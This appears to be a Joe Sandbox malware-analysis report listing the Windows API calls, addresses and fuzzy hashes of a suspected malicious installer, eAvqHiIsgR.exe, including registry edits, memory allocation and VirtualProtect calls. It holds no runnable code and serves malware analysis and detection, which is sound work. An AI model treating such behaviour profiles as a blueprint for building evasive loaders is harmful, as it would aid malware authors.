                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                                      • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                                      • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                                      • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                                      APIs
                                                                      • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402442
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040244B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseDeleteValue
                                                                      • String ID:
                                                                      • API String ID: 2831762973-0
                                                                      • Opcode ID: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                                      • Instruction ID: 28034f9d49707e31730e5ee4ae5769526bd8744af0d0927f07882998c216e066
                                                                      • Opcode Fuzzy Hash: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                                      • Instruction Fuzzy Hash: E3F09632600121DBE720BFA49B8EAAE72A59B40314F25453FF602B71C1D9F84E4246AE
                                                                      APIs
                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$EnableShow
                                                                      • String ID:
                                                                      • API String ID: 1136574915-0
                                                                      • Opcode ID: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                                      • Instruction ID: 2686c2d45ba130581374544c13beebfcaf73fd10f5aa92b185336ae358fe78f7
                                                                      • Opcode Fuzzy Hash: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                                      • Instruction Fuzzy Hash: 69E09232B04200EFD714EFA5EA8856E7BB0EB40325B20413FF001F20C1DAB848418A69
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                        • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                        • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                                        • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                      • String ID:
                                                                      • API String ID: 2547128583-0
                                                                      • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                      • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                                      • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                      • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                                      APIs
                                                                      • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\eAvqHiIsgR.exe,80000000,00000003), ref: 00405C94
                                                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCreate
                                                                      • String ID:
                                                                      • API String ID: 415043291-0
                                                                      • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                      • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                                      • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                      • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                                      APIs
                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                                      • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1375471231-0
                                                                      • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                      • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                                      • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                      • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(00000000), ref: 72A42AF7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3692894064.0000000072A41000.00000020.00000001.01000000.00000005.sdmp, Offset: 72A40000, based on PE: true
                                                                      • Associated: 00000000.00000002.3692870436.0000000072A40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3692910209.0000000072A43000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3692981384.0000000072A45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_72a40000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 2bbdca54275d0c06ec40212366079209ac6ef86f11803a8a70ae6eeae97a024c
                                                                      • Instruction ID: 8a549e8822df2aef5d2f7a4ffbd1eff9b6617cbd420399db286888caf67271f2
                                                                      • Opcode Fuzzy Hash: 2bbdca54275d0c06ec40212366079209ac6ef86f11803a8a70ae6eeae97a024c
                                                                      • Instruction Fuzzy Hash: 3D418373580204DFDB21DFAED980B593BB4EB88314F30682AE505C7259CF39E5A2CB61
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: wsprintf
                                                                      • String ID:
                                                                      • API String ID: 2111968516-0
                                                                      • Opcode ID: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                                      • Instruction ID: 7f5a5d1368c13d317d2e99ee4d98356b480ceadea176dd08c5889da6900fd1c4
                                                                      • Opcode Fuzzy Hash: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                                      • Instruction Fuzzy Hash: 7E21B730D04299FADF328BA885886AEBB749F11314F1440BFE491B73D1C2BD8A85DB19
                                                                      APIs
                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: FileMove
                                                                      • String ID:
                                                                      • API String ID: 3562171763-0
                                                                      • Opcode ID: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
                                                                      • Instruction ID: c16fe538d576f0a812f108a5c598968f2bbae53de2c44bc87e09c6d73b5458c5
                                                                      • Opcode Fuzzy Hash: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
                                                                      • Instruction Fuzzy Hash: EEF01D3160852496DB20ABA54E49E5F3264DB42769B24033BF422B21D1EABC8542956E
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402749
                                                                        • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointerwsprintf
                                                                      • String ID:
                                                                      • API String ID: 327478801-0
                                                                      • Opcode ID: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
                                                                      • Instruction ID: d2cb0ca5e863be2ef59b536234997f243a65a7806d73518010ac019a9530af38
                                                                      • Opcode Fuzzy Hash: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
                                                                      • Instruction Fuzzy Hash: 7EE09271B00114EED711FBA4AE49DBF77B8EB40315B10403BF102F10C1CABC49128A2E
                                                                      APIs
                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileStringWrite
                                                                      • String ID:
                                                                      • API String ID: 390214022-0
                                                                      • Opcode ID: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                                      • Instruction ID: a2264a5e3b04165b7de03e79847980bb6a424129cbe2f78830b73284cd35be0b
                                                                      • Opcode Fuzzy Hash: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                                      • Instruction Fuzzy Hash: F8E04831610114ABD7203EB14F8D97F31A9DB44304B34153FBA11761C6D9FC5C414279
                                                                      APIs
                                                                      • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: PathSearch
                                                                      • String ID:
                                                                      • API String ID: 2203818243-0
                                                                      • Opcode ID: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
                                                                      • Instruction ID: 99b882ef8ac932529d6fdfe3c41faefb6a71927cb26e20fd81cb329c01224dc0
                                                                      • Opcode Fuzzy Hash: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
                                                                      • Instruction Fuzzy Hash: 93E0DF72304210EFD710DF649E49BAB37A8DF10368B20427AE111A60C2E6F89906873D
                                                                      APIs
                                                                      • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FD4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                      • Instruction ID: 8c71f3c26dc4a4bf3eef9e60a583d004d00a96479e721722a8f6be6a9d57506c
                                                                      • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                      • Instruction Fuzzy Hash: 1CE0E6B201450ABEDF095F50DD0ED7B3B1DE704300F14452EF906D4050E6B5A9205A34
                                                                      APIs
                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                      • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                                      • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                      • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                      • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                                      • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                      • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(72A4404C,00000004,00000040,72A4403C), ref: 72A4293F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3692894064.0000000072A41000.00000020.00000001.01000000.00000005.sdmp, Offset: 72A40000, based on PE: true
                                                                      • Associated: 00000000.00000002.3692870436.0000000072A40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3692910209.0000000072A43000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3692981384.0000000072A45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_72a40000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: bcd22bf4bc15bb4e219002f2f485f73e9f3b605434b2a595888fff97ebaf2894
                                                                      • Instruction ID: 8e8a451949760fd47c50ff6a808f3128dcf029f095497080e08f9af82585d201
                                                                      • Opcode Fuzzy Hash: bcd22bf4bc15bb4e219002f2f485f73e9f3b605434b2a595888fff97ebaf2894
                                                                      • Instruction Fuzzy Hash: 87F092B3988281DED361CF6E84847053FF0A398354B314E6EE598D7241E73EE1668B11
                                                                      APIs
                                                                      • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402413
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
